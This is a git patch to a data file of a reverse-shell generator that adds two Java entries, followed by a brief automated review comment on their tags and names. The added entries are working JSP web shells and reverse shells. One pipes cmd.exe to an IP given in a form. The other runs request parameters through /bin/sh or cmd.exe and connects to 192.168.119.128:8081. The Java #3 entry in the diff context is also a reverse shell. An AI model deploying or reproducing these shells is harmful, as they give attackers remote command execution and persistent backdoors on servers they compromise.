From dfa46c8ff1edfc65208b2a9484d374fa9ddfe105 Mon Sep 17 00:00:00 2001
From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com>
Date: Fri, 10 Mar 2023 11:17:24 -0500
Subject: [PATCH] Update data.js Added 2 Java Reverse Shells
---
js/data.js | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/js/data.js b/js/data.js
index 56059dc..1b05dad 100644
--- a/js/data.js
+++ b/js/data.js
@@ -299,6 +299,16 @@ const reverseShellCommands = withCommandType( "name": "Java #3", "command": "import java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class shell {\n public static void main(String[] args) {\n String host = \"{ip}\";\n int port = {port};\n String cmd = \"{shell}\";\n try {\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n Socket s = new Socket(host, port);\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n while (!s.isClosed()) {\n while (pi.available() > 0)\n so.write(pi.read());\n while (pe.available() > 0)\n so.write(pe.read());\n while (si.available() > 0)\n po.write(si.read());\n so.flush();\n po.flush();\n Thread.sleep(50);\n try {\n p.exitValue();\n break;\n } catch (Exception e) {}\n }\n p.destroy();\n s.close();\n } catch (Exception e) {}\n }\n}", "meta": ["windows", "linux", "mac"] + }, + { + "name": "Java #4", + "command": "<%@\r\npage import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"\r\n% >\r\n<%!\r\nstatic class StreamConnector extends Thread\r\n{\r\n InputStream is;\r\n OutputStream os;\r\n StreamConnector(InputStream is, OutputStream os)\r\n {\r\n this.is = is;\r\n this.os = os;\r\n }\r\n public void run()\r\n {\r\n BufferedReader isr = null;\r\n BufferedWriter osw = null;\r\n try\r\n {\r\n isr = new BufferedReader(new InputStreamReader(is));\r\n osw = new BufferedWriter(new OutputStreamWriter(os));\r\n char buffer[] = new char[8192];\r\n int lenRead;\r\n while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\r\n {\r\n osw.write(buffer, 0, lenRead);\r\n osw.flush();\r\n }\r\n }\r\n catch (Exception ioe)\r\n try\r\n {\r\n if(isr != null) isr.close();\r\n if(osw != null) osw.close();\r\n }\r\n catch (Exception ioe)\r\n }\r\n}\r\n%>\r\n\r\n

JSP Backdoor Reverse Shell<\/h1>\r\n\r\n
\r\nIP Address\r\n\r\nPort\r\n\r\n\r\n<\/form>\r\n

\r\n


\r\n\r\n<%\r\nString ipAddress = request.getParameter(\"ipaddress\");\r\nString ipPort = request.getParameter(\"port\");\r\nif(ipAddress != null && ipPort != null)\r\n{\r\n Socket sock = null;\r\n try\r\n {\r\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\r\n Runtime rt = Runtime.getRuntime();\r\n Process proc = rt.exec(\"cmd.exe\");\r\n StreamConnector outputConnector =\r\n new StreamConnector(proc.getInputStream(),\r\n sock.getOutputStream());\r\n StreamConnector inputConnector =\r\n new StreamConnector(sock.getInputStream(),\r\n proc.getOutputStream());\r\n outputConnector.start();\r\n inputConnector.start();\r\n }\r\n catch(Exception e) \r\n}\r\n%>", + "meta": ["windows", "linux", "mac"] + }, + { + "name": "Java Two Way", + "command": "<%\r\n \/*\r\n * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button \"send\" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n * the command specified in the HTML form). 
This is to avoid to keep it simple.\r\n *\/\r\n%>\r\n\r\n<%@page import=\"java.lang.*\"%>\r\n<%@page import=\"java.io.*\"%>\r\n<%@page import=\"java.net.*\"%>\r\n<%@page import=\"java.util.*\"%>\r\n\r\n\r\n\r\n jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">\r\n <input TYPE=\"text\" NAME=\"shell\">\r\n <input TYPE=\"submit\" VALUE=\"Send\">\r\n<\/form>\r\n<pre>\r\n<%\r\n \/\/ Define the OS\r\n String shellPath = null;\r\n try\r\n {\r\n if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\r\n shellPath = new String(\"\/bin\/sh\");\r\n } else {\r\n shellPath = new String(\"cmd.exe\");\r\n }\r\n } catch( Exception e ){}\r\n \/\/ INNER HTML PART\r\n if (request.getParameter(\"shell\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"shell\") + \"\\n<BR>\");\r\n Process p;\r\n if (shellPath.equals(\"cmd.exe\"))\r\n p = Runtime.getRuntime().exec(\"cmd.exe \/c \" + request.getParameter(\"shell\"));\r\n else\r\n p = Runtime.getRuntime().exec(\"\/bin\/sh -c \" + request.getParameter(\"shell\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n \/\/ TCP PORT PART\r\n class StreamConnector extends Thread\r\n {\r\n InputStream wz;\r\n OutputStream yr;\r\n StreamConnector( InputStream wz, OutputStream yr ) {\r\n this.wz = wz;\r\n this.yr = yr;\r\n }\r\n public void run()\r\n {\r\n BufferedReader r = null;\r\n BufferedWriter w = null;\r\n try\r\n {\r\n r = new BufferedReader(new InputStreamReader(wz));\r\n w = new BufferedWriter(new OutputStreamWriter(yr));\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n w.write( buffer, 0, length );\r\n w.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n 
if( r != null )\r\n r.close();\r\n if( w != null )\r\n w.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n \r\n try {\r\n Socket socket = new Socket( \"192.168.119.128\", 8081 ); \/\/ Replace with wanted ip and port\r\n Process process = Runtime.getRuntime().exec( shellPath );\r\n new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n out.println(\"port opened on \" + socket);\r\n } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>", + "meta": ["windows", "linux", "mac"] }, { "name": "Javascript",
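Review bot: The `meta` tags on the new "Java #4" entry do not match its command string, which calls `rt.exec(\"cmd.exe\")` unconditionally while the entry is tagged `["windows", "linux", "mac"]`; `"meta": ["windows"]` would describe it accurately. Both added entries are JSP pages (they open with `<%@ page import … %>` or `<%` scriptlets) rather than standalone classes like the neighbouring "Java #3", so the `name` fields should say JSP to make clear they only run inside a servlet container. The `reverseShellCommands` array starts and ends outside this hunk, so whether other entries follow a naming or tagging convention for container-hosted pages cannot be confirmed from here.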